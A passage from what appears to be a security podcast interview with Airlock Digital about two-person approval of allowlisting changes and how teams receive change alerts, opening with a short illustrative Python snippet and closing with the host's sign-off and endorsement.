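change = PendingChange("allow-app-42", proposed_by="app_team_alice")
change.approve("security_bob")   # only takes effect after a second person signs off
print(change.approved)
```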
Yeah. So I've always wondered about like, yeah, dual key, like in the submarine movies,
you know what I mean?
The guy takes the key around from around his neck and the other one does and they have
to turn them at the same time kind of thing.
Yeah, that makes a lot of sense.
Do many people actually bother with that though?
A lot of people want it in the enterprise because, and it's interesting because they will say, okay, I will trust this team to allow things
if I have oversight of it.
So they'll want the security team to have oversight, but the application team to actually
make the decisions.
So they're just sitting there going, look, look, look, approve.
You know, that's definitely needed.
Last question is, you know, you keep talking about this visibility.
How are people choosing to consume those changes?
Is that like pumped out to a SIEM?
Is it like a Slack alert?
Like how do people usually choose to get that information?
Because it is quite low volume, right?
It is, yeah, especially when you're talking about the change.
So, you know, either a push notification to Slack is a big one.
The other one is SIEM alerts, as you said.
And then third is definitely actually being in the console.
I'm seeing a preference towards people actually wanting to sort of manage the product outside
of the product, but that normally happens only for the large enterprise end of town
where they've really got a whole bunch of other systems that they're automating.
So I think it's just about making sure that you have the integrations in the ecosystem
for the tools that the customers have so you can push those notifications and changes out.
Man, awesome chat. I love talking to you about how Airlock's all grown up.
It's really cool. Great to see you Dave and I'll catch you again soon.
Thanks so much Patrick. Cheers.
That was Dave Cottingham there from Airlock Digital, a fine company that makes fine software. I
do absolutely 100% recommend and endorse Airlock Digital. I am not an advisor to
them, I just think they're really cool. And that is it for this week's show. I do
hope you enjoyed it. I'll be back next week with more security news and
analysis, but until then I've been Patrick Gray. Thanks for listening.